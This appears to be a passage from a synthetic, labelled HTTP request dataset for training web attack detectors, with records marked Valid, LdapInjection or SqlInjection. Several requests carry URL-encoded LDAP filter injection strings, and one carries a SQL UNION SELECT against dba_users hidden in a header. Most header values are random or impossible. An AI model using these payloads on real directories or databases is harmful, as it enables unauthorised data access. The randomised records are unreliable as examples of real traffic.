If-Range: Sun, 29 Mar 09 11:42:55 CET
Max-Forwards: 0217
MIME-Version: 1.4
Pragma: d=neM
Proxy-Authorization: lert mmeei=fdhn
Authorization: syualn atb5Dae=akwes
Range: -6
Referer: http://www.ueoatf1.org/saeEee/Iemmno/isuidZ/peInNeoe/namlks.php4
TE: trailers
Trailer: Via
User-Agent: Mozilla/0.8 (X11; U; Linux i586 6.7; br-by; rv:9.4.8) Gecko/08442257
UA-CPU: 68000
UA-Disp: 3158,9578,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 161x2699
Via: 4.6 www.hirepn.jpg, 8.5 www.oyht.htm
Transfer-Encoding: identity
Upgrade: baheen/8.2, os6u/6.0, sloeee/4.4
Warning: 799 56.216.155.145 "xcmStingtiLaa" 
X-Forwarded-For: 215.199.241.153
X-Serial-Number: 99725023233624761
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12174
Start - Id: 38113
class: LdapInjection
GET /srO4CtrCZ/3Aupdate/z9t@7ITDXD/e1wgdHN/mDiQlbp/mNhiPd_wWiVn05mpr9r.png?eK=%29%28+++%7C+%28At%3Dyli*%29&Ne9rYN=015686&sc8z8=+IrEBs%5Ch%3Aite5re&T9oxKitf=%3Fneatj4tg-%5D&0tihi9rs=9794 HTTP/1.1
Host: 128.70.108.236
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 3-chsiO, hrb-zatotMt2;q=0.9, eteh9kts-eoii9a3
Cache-Control: no-cache
Client-ip: 33.244.156.204
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="0"
Date: Thu, 26 Oct 06 02:22:30 UTC
ETag: W/"Irr4LufP3gSyFhulv"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Tue, 13 May 08 24:31:28 CET
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "0VvPD1egPVWx_GJdM"
If-None-Match: "cALDKn.VJc_03fZ"
If-Range: *
Max-Forwards: 73
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Digest response="ea099B2EAc39d1E3FBB128D7EAd42dF5"
Range: 448259-
Referer: /uakr/qlneh/eeird/TaYnetm/lreendr.mpg
TE: deflate;q=0.4,gzip;q=0.3
Trailer: Trailer
User-Agent: swfV6w http://www.ei8u.net
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3700x2595
Via: 7.7 www.uySaroa.htm, FTP/3.7 181.195.110.122
Transfer-Encoding: gzip
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38113
Start - Id: 37859
class: LdapInjection
GET /hUadt/ZvHgroup by5T9ZDpsW7ZhomeR/dvFjvtAwanghsoAtl.pl?Sebszilynytbm9=49946&rrFpetai=99732063&s5doitpsaeot=ouAr&Eiamtp=uto&srtezerlo=eCeedh&TizrietssmResAR=nNdsdrpoerTd0tdxif&nvoeaqTdBlr=2880&vaumpared=5&dxrgatattS9pil=nftpz%7Cob&alsoe=g%26%27e+%5D2ytid%24ioat&I6wtpmotrrhih=to5rrLh&tN=%29++%28++%7C%28displayName%3Dhad*%29++++%28name+%3Dhad*%29%28++mail%3Dhad*+++%29&Mj3xJMCfR=4455956 HTTP/1.0
Host: www.Ft1a.biz
Connection: keep-alive
Accept: image/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=155
Client-ip: 39.35.248.126
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="01"
Date: Thu, 12 Apr 07 22:41:11 UTC
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 23 Mar 04 21:15:01 UTC
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Jun 04 15:11:28 CET
Max-Forwards: 1
MIME-Version: 7.8
Pragma: enq=dd
Proxy-Authorization: Digest username="otjbsa"
Authorization: NTLM ZXRldGViaWF4bW54ZUhMZWZodGFhdmlXZEliZXR1c3RlZUQ=
Range: 3-43,-454,28574-
Referer: /OasiUtan/zhtoee/nnhheT/eAotnUr/oexm.jsp
TE: trailers,chunked;q=0.7,trailers
Trailer: Referer
User-Agent: Mozilla/5.5 (compatible; MSIE 2.8; Win 9x; eisyaaun; l5xrtlb8)
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37859
Start - Id: 38323
class: LdapInjection
GET /bz/h5nt6ej/uocthbesedcAwi/3lt6.jpeg?i5yheesoanp=bewH&6eanoEhaOqn5T2h=mts&haCtotpjruel=%29%28++%7C+++%28cn%3D*o+++%27brien*++++%29%28mail%3D*o++++%27brien*%29+&r3olbtweR=hn&ehZeeh=afskrn&xrzntaiEthe=mwQ2K%40njW1pS&lrdl=aechoexecfve&rumeem=ghtaccesfoV&bonhAFyneoath0=nd4Hg&d1=o&2a=307&hl0=6080&1telnetjCt=97&yNqe6as=sdc HTTP/1.1
Host: www.5orllyc.st
Connection: close
Accept: image/jpeg;q=0.4, text/*;q=0.4
Accept-Charset: windows-1250;q=0.6, iso-8859-9
Accept-Encoding: deflate;q=0.3, identity, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 26.169.24.36
Cookie: ru=8;tesseenehaldd=ocOKh
Cookie2: $Version="0"
Date: Mon, 11 Sep 06 01:11:07 UTC
ETag: W/"eYKeGvCQslKNy.3T8"
Expect: 100-continue
From: etae@mLte.st
If-Modified-Since: Tue, 30 Jun 09 24:13:22 UTC
If-Unmodified-Since: Sat, 30 Jan 10 15:23:52 CET
If-Match: "zUwsr3Ut2Oo6_X@@8Y"
If-None-Match: *
If-Range: Sun, 17 Aug 08 10:34:36 GMT
Max-Forwards: 088
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: Digest uri=/n9ernn/nemi3msm/uaMky/efahltl/rshgp.mpg
Range: -717,218781-
Referer: http://www.en3grpir.uk/0eli16/yeog/ocsfttes.nsf
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.4 (Machintosh; U; PPC 2.2; hs-hs; rv:6.8.4) Gecko/45771232
UA-CPU: 68000
UA-Disp: 6615,674,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: ahc/4.2 98.75.232.168, 6.1 www.heon7.jpg
Transfer-Encoding: deflate
Upgrade: ipd8o/8.2, wrthnk/5.7, ntg/1.8, rtt/1.6
Warning: 900 78.163.243.190 "eegoi38hvlbccn" "Tue, 23 Aug 05 02:06:35 GMT"
X-Forwarded-For: 36.43.147.188
X-Serial-Number: 3515531846
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38323
Start - Id: 16408
class: Valid
GET /oF0Tq_fWGDP3OPyl2/1emo_VOb0.cfm?rewo6ies3oHnurh=7&2zexallr5=1767&1hnar=qAesyeis&0x=iiu%40eletchb+istdint6w&c4mailu=nn2oaa2 HTTP/1.1
Host: www.0tietzrber.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 129.156.31.222
Cookie: latG=eeSd3k1reinnpTo;ocsoeaeeDbiE=sfeieho/;;nmsri0iPc=hCqn<uotofdtha;iE4litEHHoH=eAhavingt0amec9es;8openFDd==e;aaTsots4iM=scUme
Cookie2: $Version="92"
Date: Tue, 21 Apr 09 16:53:39 GMT
ETag: W/"ETw_iNmkxqQeHE6"
Expect: rluledh=ra3hni3b;hF3jtc
From: seale@faF5s1.ch
If-Modified-Since: Tue, 15 Sep 09 10:10:09 UTC
If-Unmodified-Since: Wed, 27 May 09 24:09:34 GMT
If-Match: "v1yudLbNIx@nYsD"
If-None-Match: "J_N_Hr-1EdYg@fY@Rx"
If-Range: Fri, 25 Sep 09 02:20:52 CET
Max-Forwards: 262
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: NTLM czJUaTVld0hpZ2gxbjhnbnAyMWd0aTduaXJudWVFUWVydGFpc3M=
Authorization: NTLM bjh2am1haGx1ZWF2bm55bkNlaGlyaFRhYWZzaDNzU3VldTZIb054QWE=
Range: 490-87428,9-6
Referer: http://www.eypuuot.uk/gItt.jpg
TE: chunked;q=0.1,chunked,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/9.2 (compatible; nIo7dwgesa; Win98; Erpxr)
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: 6.0 www.i4iGw.shtml, 5.8 88.204.159.152:617, g8veet/7.3 79.180.223.67
Transfer-Encoding: lnio; erct=wnIohne
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 481 www.dsiixEh.shtml:370 "isiipeE" 
X-Forwarded-For: 131.177.35.234
X-Serial-Number: 493178
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16408
Start - Id: 11053
class: Valid
GET /6c2BTlibjEwYYJ3/p5yIn9UcsjdTyyCs2xr/ti8oRdY/nknrcLpata/insertxZBZeouZ.6homeB/m0LeuhnoiuNe1srdf7a/n2/34O-isBuiF/divnVhr1O3qsD/eXsfyLaSTHtP7bp9ZSy/tnj/iehhreee6s.js?dcifa=taj5giNpE-b HTTP/1.1
Host: 252.55.14.196
Connection: keep-alive
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: seDono-rak;q=0.8, teealgT-i5nsbp;q=0.4, Roesn-ser;q=0.1, l-nttnh1b
Cache-Control: no-transform
Client-ip: 224.189.199.226
Cookie: rRdfby=l_M;lib-.Mj-bgsound9n-pid=nossscript;beohtosaum5d=57329676;al1hguft88ji=[bin@w4 ;aeytlghCFf=3Rkneettilh;okeupfn=1MKc_p9c.
Cookie2: $Version="171"
Date: Wed, 03 Mar 10 05:42:09 GMT
ETag: W/"kaTPiPtttkE5NmIgy7"
Expect: qitseelh=remts
From: e9esarYc@ncTsfi.org
If-Modified-Since: Sun, 11 Apr 04 08:07:17 CET
If-Unmodified-Since: Mon, 23 Aug 04 20:39:32 GMT
If-Match: "d.BShUoGxBE_zBt8H"
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aeeWg xqe5owa=r1ap5OA
Authorization: Basic ZXRzMGlkdGE6bHNvb2Zy
Range: 4311-449540
Referer: http://www.earpde.st/prhQ.mpeg
TE: gzip;q=0.0
Trailer: Connection
User-Agent: Rc6yajoe4/1.6.8.2
UA-CPU: x86
UA-Disp: 0717,4017,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1068x1035
Via: FTP/1.9 79.70.171.163, neq/5.0 181.36.207.116
Transfer-Encoding: gzip
Upgrade: orc/1.6, 9fle/6.2, 08otw/8.4, Zmleef/2.9, tDi/7.7
Warning: 660 97.116.247.67 "al7pinn" "Wed, 19 Dec 07 14:44:12 CET"
X-Forwarded-For: 42.148.64.117
X-Serial-Number: 5468318216
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11053
Start - Id: 9258
class: Valid
GET /n@JRGPXQ2xpt6xVNFJ/haa/nGeVcPVZsJG9bRYpxilZ/LqEIthdM/nhneVbh/fvPMpwucY_SB/eQqsw2saSedGerbttsS.js?xmnxOntnru=tu0X&ifIyer8cryt=%29i%40ei&Aehu6tosantxRlf=%29iIa6h&EiYb=I+ke&WvarNH=jYoCYz0&ctleeniaofoetha=1582517575&enAvo=65258971&1tmthh=oqMh7&epdExpiahilnkeS=ecq60li&rIk=8nuh6&LLraqoaysr7n=dKSnewXL%40&eoTesiAk=817139&dacrlasnle3yh=saebdihij&2e5mthcTss7nrd=0410057&ce=cncdZm5xoh HTTP/1.1
Host: 167.123.237.198:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 19.227.53.247
Cookie: hkd7atid=ny2Maasmett;syed=U;-;itSoceht=0;ngohein=r2UsS;tytlbc5nlfgnbeV=lqm0ierhaHodt;haq0nhtaEurnad=3a@window.open
Cookie2: $Version="9"
Date: Sat, 01 Aug 09 04:52:39 GMT
ETag: W/"jbncgDaLCEBNdHk1-AJ"
Expect: 100-continue
From: odmn5jk@dalmleb.ch
If-Modified-Since: Wed, 27 Jan 10 10:56:55 GMT
If-Unmodified-Since: Tue, 26 Jun 07 02:39:05 CET
If-Match: *
If-None-Match: "@bh0vsaN33Hg@HklFWxK"
If-Range: Tue, 16 Nov 04 01:04:08 UTC
Max-Forwards: 8053
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM ZWdkc2hvVGhIc0U4ZWhhYWNlc2VhZWJsbkF0c25vaG91
Authorization: Digest nonce
Range: 30-703,-64,-521
Referer: /2EaetTrS/9htt.zip
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: 6aoTdeit8idaea
UA-CPU: 68000
UA-Disp: 2373,285,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 476x394
Via: FTP/2.3 www.eeh0ptia.gif:9, HTTP/4.7 118.57.133.179
Transfer-Encoding: gzip
Upgrade: te6hij/6.9, n6aen/3.6, ae9/5.4, c8eog/3.3, hbdo/6.2
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 6361501789
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9258
Start - Id: 41212
class: SqlInjection
GET /hnd/bhD7ignWpSZ/ePcxv_IMJBt1qGIsi/ie/etha5dIYctnas9estzn/elngb/lo7P2l-EVNZFPLtL/hWA-QB6S7dwVVBk/zperlR/tsmn/3Rtdtniibkeesbh/PYwaA-GS.mdb?SrlOrta3r=1tomAaM2qsa&neeetlzsd=8296&nehiarMl=fli&ttnax=oGQmkbat&hAndhsacQcc2=70567&bRp=1700623&etfsehtaeswn=d2V_0n&ga8dctVha=872981335&cyeogn=9&7sTH6jmh=nn6&wdnftw=hu1ls7Oyisoioay&nzz=t8 HTTP/1.0
Host: 190.186.36.74
Connection: keep-alive
Accept: application/*
Accept-Charset: windows-1254;q=0.2, iso-8859-3, windows-1253;q=0.2, shift_jis;q=0.2
Accept-Encoding: identity, gzip
Accept-Language: chairs'    UN/**/ION    SEL/**/ECT     ugocAhfl     FROM  dba_users   WHERE     ydfum   like '%25
Cache-Control: max-age=191
Client-ip: 146.208.88.192
Cookie: dieie7ftttbslo=7232840815;etoeftotna2=e dende63::xr5irp[p;rosroreweY=eEBPEa;snfabnptg8rhfw=650060
Cookie2: $Version="6"
Date: Thu, 07 Jun 07 23:00:17 GMT
ETag: "bcCurLCsm8JV-ngp"
Expect: 100-continue
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: "wTj1Zvpyz3ZKiu0a7"
If-None-Match: *
If-Range: Tue, 31 Jul 07 08:17:54 UTC
Max-Forwards: 3
MIME-Version: 5.2
Pragma: ebtrke='e'
Proxy-Authorization: muisi doaouyba=onhfte
Authorization: aEuSo 9dhabosO=esng
Range: 870-,33722-,80-34
Referer: http://www.nIoe.net/omnrwa/aetisin/m1dfhc/gnwn/fytz.zip
TE: trailers,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Otte5nbet (sccCd47; rHSrAiaHa; s128KO)
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 3.5 209.225.147.148
Transfer-Encoding: identity
Upgrade: sdrona/5.0, vtfpom/3.2, guE/8.0
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 226.24.98.217
X-Serial-Number: 9505530425947859
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41212
Start - Id: 38094
class: LdapInjection
GET /ob.i/ldaDanoodsehaler/aTIjssA7/mailt7Nd1.swf?lag=8a%29%28%26%28objectClass+%3D+Ox*%29&syvZa=fj6l&eu5cDraoodns=drpfa&twglruatclmnm=farlcLheJeehped1&dnrEnrat=ci&uT=ip&NqIC.j=321244&r1Thinsert=439&8t=056212891 HTTP/1.0
Host: 58.223.214.92
Connection: keep-alive
Accept: text/html
Accept-Charset: iso-8859-8;q=0.1, windows-1255
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=20099
Client-ip: 209.94.206.107
Cookie: 3yy8=- c
Cookie2: $Version="74"
Date: Tue, 26 Oct 04 15:22:25 CET
ETag: W/"ffkCjKJgxmCrLpG"
Expect: yzytf=wi36hMoe
From: oaitn@wnslnp.com
If-Modified-Since: Mon, 27 Aug 07 24:58:53 CET
If-Unmodified-Since: Sat, 03 Feb 07 07:20:13 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 03:06:26 CET
Max-Forwards: 1970
MIME-Version: 9.4
Pragma: 2eiNanEg=sena7dln
Proxy-Authorization: atswre uFty=o9ssf
Authorization: Basic YWVBaXVFOnNsZWxyMw==
Range: 943633-,-798,-667
Referer: http://www.najoht.cz/ebki/tT1o3q.php3
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/5.6 (compatible; MSIE 3.9; WinNT; fytkfemdEl)
UA-CPU: 68000
UA-Disp: 119,1491,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 3700x2595
Via: FTP/1.4 118.101.96.246, HTTP/7.9 www.fsDbt.png:5, 2.2 212.95.117.162
Transfer-Encoding: pcir
Upgrade: ttyt/8.2, cspny/5.6, dpX8/2.9
Warning: 525 www.tntaivc.png "taaisanteflseGtnsd" "Thu, 10 Jun 04 12:50:10 UTC"
X-Forwarded-For: 42.181.165.201
X-Serial-Number: 814494240740
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38094
Start - Id: 28723
class: Valid
GET /ht/FupdateQhttpsdH/c5TnSYYej1f-JENQOl.bin?evElmhhat=625245&mfp5efahmisa=eeTstmyhmmpFDaEsss&2447zM=i8c3j HTTP/1.1
Host: www.aitXbn5riT.uk
Connection: o3tOauae
Accept: video/quicktime
Accept-Charset: iso-8859-8-i, windows-1250;q=0.0
Accept-Encoding: compress;q=0.1
Accept-Language: adif-neneIra4, GA-useelra;q=0.3, is-cg, dhbos-iu;q=0.1
Cache-Control: max-age=5397
Client-ip: 7.143.6.122
Cookie: tahom5n=sq8ch=0atW:
Cookie2: $Version="7"
Date: Sat, 19 Jul 08 11:52:49 UTC
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Mon, 11 Dec 06 13:39:41 GMT
If-Unmodified-Since: Fri, 18 Apr 08 13:38:55 UTC
If-Match: *
If-None-Match: "kK4WdFOi7yI_K7F"
If-Range: Fri, 19 Oct 07 22:56:28 GMT
Max-Forwards: 2
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic ZXJVczp1MGE2b2VCTw==
Range: -5
Referer: http://37fnH.fr/dctm9t/l1chna/ta3dS/hahk.tiff
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.8 (compatible; MSIE 4.2; Linux i586; eps6cmaht)
UA-CPU: PowerPC
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: HTTP/2.2 www.atPa.js, HTTP/4.3 108.112.164.98, HTTP/3.3 107.244.180.54
Transfer-Encoding: d4nit
Upgrade: fsum1e/6.1, i6ee/7.9, ijopmA/5.0, jtoin/2.2
Warning: 642 11.210.65.54:24773 "arbhrinytrt" 
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 840252996378195680
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28723
Start - Id: 1079
class: Valid
GET /rowlhterjrynsuIeeu/mkFNZLoxNW9@1h/ngzcz/aRX/aCOsm3ET7M.@7stLQ/tTongnr/aubdaezLra/IVLb@9Bn8P/rknfIeeqjeii/iyqsI0a/a6iaor.gif?SnennUDameass=6didLdakg&mail8pAt9xs.A=%3C0&oehvar4uytyp=ae%2FsAoe%3Dcs%3Caehchild HTTP/1.1
Host: 195.145.20.242:80
Connection: close
Accept: text/plain;q=0.9
Accept-Charset: utf-7;q=0.4, utf-7;q=0.0, x-mac-japanese, iso-8859-7
Accept-Encoding: *;q=0.3
Accept-Language: lde-joucst, Ea2t-lnygdty, e-besgioru, ldrt-aseteos, asnhszk9-n
Cache-Control: max-stale
Client-ip: 244.31.117.137
Cookie: ubt=tiLP5Q;4mtsicnIrmgtit=870158;60icceofcoNo0ls=i1fv4oz.0S;arwrenorRheans=1ocbaformm;fustxr0sdissbf=oVLSSMkqVc
Cookie2: $Version="5"
Date: Mon, 15 May 06 20:03:14 CET
ETag: "U.e4C71bGTwLumv8iX_"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Wed, 08 Jul 09 09:42:38 GMT
If-Unmodified-Since: Fri, 19 Oct 07 15:19:36 GMT
If-Match: "J@II1wChV5WgSo3UDqh"
If-None-Match: "XGjvR-7jyQnv_fZT"
If-Range: Mon, 15 Sep 08 22:24:07 CET
Max-Forwards: 2
MIME-Version: 9.9
Pragma: nd2ed=rh
Proxy-Authorization: 7u2C etet29se=rQ0naiEn
Authorization: lazirr 0arehwe=awhe
Range: 567851-
Referer: /otgtna/eaLeerev/ahoo2/ov0oao7.nsf
TE: trailers
Trailer: If-Modified-Since
User-Agent: esKrtteEt
UA-CPU: MIPS
UA-Disp: 465,0552,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 8837x3320
Via: 1.1 www.tscl.html, rf6eii/6.2 www.3asfetnr.html
Transfer-Encoding: identity
Upgrade: oebee/0.9, uqel/6.0, ewa/5.3, aw7p/3.5, oosLdo/3.5
Warning: 681 241.65.101.209 "Bne8meaetNbm1aowme3" 
X-Forwarded-For: 65.243.221.166
X-Serial-Number: 0153270
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 1079
Start - Id: 11229
class: Valid
GET /y.Rgy.A1FIlw5G@6vOp/iGodtyyreriL2ta7xist/Ha-X/r3tKUQ_FXH0MZTQqT/ay4KY/nHc/nxNGgte/N_vMPaS.1FtGKCw/s.cDBSjeKWlz/nadlEh/8suesiztvTtztme0ihz.cfm?lntdhnsdta5aSe=+anANqJia&unlqaa=5594 HTTP/1.0
Host: www.g6nsoi.de:9449
Connection: entd
Accept: */*
Accept-Charset: ks_c_5601-1987;q=0.0, iso-8859-7;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 59.66.86.162
Cookie: 3WmlognsOT=61237
Cookie2: $Version="68"
Date: Sun, 20 Nov 05 04:32:57 UTC
ETag: "TE11mvbXzB-pOhLld"
Expect: noaleov=h01o
From: aarli@mLmeltu.be
If-Modified-Since: Sun, 26 Oct 08 24:04:17 GMT
If-Unmodified-Since: Sat, 22 Dec 07 14:44:43 UTC
If-Match: "Sv0QPZFm.svW8BTN7zX"
If-None-Match: *
If-Range: Thu, 03 Jun 04 01:24:46 UTC
Max-Forwards: 4859
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: bAGo Oiw9tsc=oisdaoot
Authorization: Digest nc=C8CCbC0C
Range: -62895,1183-7810
Referer: http://rysle.it/p0otrpr/liao0pi.rar
TE: trailers,trailers,trailers
Trailer: From
User-Agent: iiErmney (hY8pS8; i_t_W9pO; uSJ@hs; n_gNPQntH; sAB6QDfK)
UA-CPU: 68000
UA-Disp: 7122,239,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 689x7201
Via: 8.6 179.44.210.232, 6.0 www.0lnolsC.tiff
Transfer-Encoding: 1aoIbS
Upgrade: uCt/3.1
Warning: 482 www.nt5e.js "raopnnI2epacwex" "Sun, 04 Jan 04 12:41:28 CET"
X-Forwarded-For: 196.44.53.29
X-Serial-Number: 450563801661696804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 11229
Start - Id: 923
class: Valid
GET /iSainenkS6lresUampd/AZHsier7ssa/4gsjre.aspx?an=0w2Ae&1owrqhvsa4ultS=iSrxBXLg&uaaa=r6o%29%29t3ymmk%40&E9aDbcl=fvc&lAtlettrF6r8ez=0oed%7C9w%27oand%5Be&ughshb0=iEXRV-hBX&9S1@_zlocationa@q=+ma7e+7enynueg%3Ftu%26&i3hldsgmnelOi=niEdg+r+&as4r=512&keteixzi20t=rN5xng2t&passthrukyp.xmljTpasswd=mjhy&ttThshcc=ad6hZzVX&naehbgpww5ibv=oyeRaoosib HTTP/1.0
Host: 234.125.144.61:80
Connection: close
Accept: audio/basic;q=0.8, text/xml;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ehdna5-au;q=0.7, n-Vh9igunD, 8-e;q=0.5
Cache-Control: no-store
Client-ip: 235.141.91.112
Cookie: pat=72;5IhtacceslQ2W=439
Cookie2: $Version="9"
Date: Mon, 23 Nov 09 05:55:12 CET
ETag: W/"6y83ZI02.DYlKkhKwcuj"
Expect: dexIi=dp5eOe
From: 3sntq@jnenrb.uk
If-Modified-Since: Wed, 12 Dec 07 20:16:29 GMT
If-Unmodified-Since: Wed, 02 Sep 09 01:16:55 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.0
Pragma: weysiHej=rc9
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: Digest algorithm=MD5
Range: 37-165,99813-448132
Referer: /hrpc/egbiLbes/tnisny53/0ycP.htm
TE: chunked;q=0.9,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: xml3t0n1tanahDt
UA-CPU: StrongARM
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 272x736
Via: HTTP/7.6 159.166.146.91:2
Transfer-Encoding: paaae
Upgrade: iehx1/0.3, ohanrn/8.7, 0ph/6.5, RaOe/2.8
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 510626783025324042
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 923
Start - Id: 18863
class: Valid
GET /ftsI/kDaPs-V5TI/lolfmo/adsw/awdemS7tKEltckLyird/3R/dCqztcatUYl4Dp/6hgKY/aKRIid1Pa/yO/-SobjectppRj/6hi.G_2qI_3HT7.jpg? HTTP/1.0
Host: 34.167.240.222:8212
Connection: close
Accept: */*
Accept-Charset: windows-1252, x-mac-hebrew, koi8;q=0.1, iso-8859-4;q=0.2, windows-1252;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 123.230.139.164
Cookie: dsnaeiefiadn=dnptsatpeeivz;TXsHIxflikedropB=049775
Cookie2: $Version="00"
Date: Tue, 22 Mar 05 05:52:24 GMT
ETag: "8r6osQIs3RbAiDM2"
Expect: 100-continue
From: mogs@imsit.st
If-Modified-Since: Sun, 06 Jan 08 12:09:20 GMT
If-Unmodified-Since: Fri, 15 Apr 05 04:12:45 GMT
If-Match: *
If-None-Match: "5Oy539X7kRzWjPgxWg"
If-Range: Sun, 19 Apr 09 09:57:50 UTC
Max-Forwards: 668
MIME-Version: 7.0
Pragma: qet=lsh
Proxy-Authorization: Basic Z2xucmVpbTpHYXNvdWVrbw==
Authorization: Basic dWlvdDpzdGozdW1pbw==
Range: 33-,46-263308
Referer: http://www.Maeao.org/acwoR/h0hia8yh.msf
TE: trailers
Trailer: Host
User-Agent: Mozilla/6.4 (Windows; U; Win 9x 2.7; en-zS; rv:4.3.2) Gecko/62875019
UA-CPU: PowerPC
UA-Disp: 708,1125,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 534x0427
Via: FTP/1.2 167.233.47.24
Transfer-Encoding: compress
Upgrade: sst/1.2, yoeg/0.2, eryeo/8.7, fnres/9.9
Warning: 951 www.irwnsd.tiff "9rmmauuilegoneDwol22" 
X-Forwarded-For: 56.146.49.3
X-Serial-Number: 65367829353425279089
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18863
Start - Id: 11286
class: Valid
